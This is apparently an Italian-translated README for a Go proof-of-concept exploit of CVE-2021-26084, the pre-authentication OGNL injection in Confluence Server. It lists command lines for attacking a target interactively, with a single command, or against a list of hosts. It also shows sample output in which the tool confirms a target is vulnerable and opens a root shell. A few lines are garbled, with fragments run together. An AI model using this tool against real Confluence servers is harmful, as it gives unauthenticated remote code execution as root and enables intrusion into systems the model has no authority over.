
CVE-2021-26084 - Iniezione OGNL in Confluence Server Webwork (RCE pre-autenticazione)
Prova di concetto per CVE-2021-26084.
Iniezione OGNL Webwork di Confluence Server (RCE pre-autenticazione)
Questo è solo a scopo educativo. Non sono responsabile delle tue azioni. Usalo a tua discrezione.
A causa del payload, non è possibile passare alcuni caratteri. L'elenco seguente è quello che ho trovato durante i miei test.
"| go run exploit.go -t <target> -i
Esempio
root@localhost:/# go run exploit.go -t http://localhost:8090 -i
CVE-2021-26084 - Confluence Server Webwork OGNL injection
Made by Tay (https://github.com/taythebot)
time="2021-09-02T00:29:37+09:00" level=info msg="Checking if https://localhost:8090 is vulnerable"
time="2021-09-02T00:29:39+09:00" level=info msg="Target https://localhost:8090 is vulnerable"
root@confluence:/# whoami
root
root@confluence:/# exit
Exiting interactive mode, goodbye
exit per uscire dalla shell interattivago run exploit.go -t <target> -c <command>
go run exploit.go -f <file> -c <command>
go mod download
go build exploit.go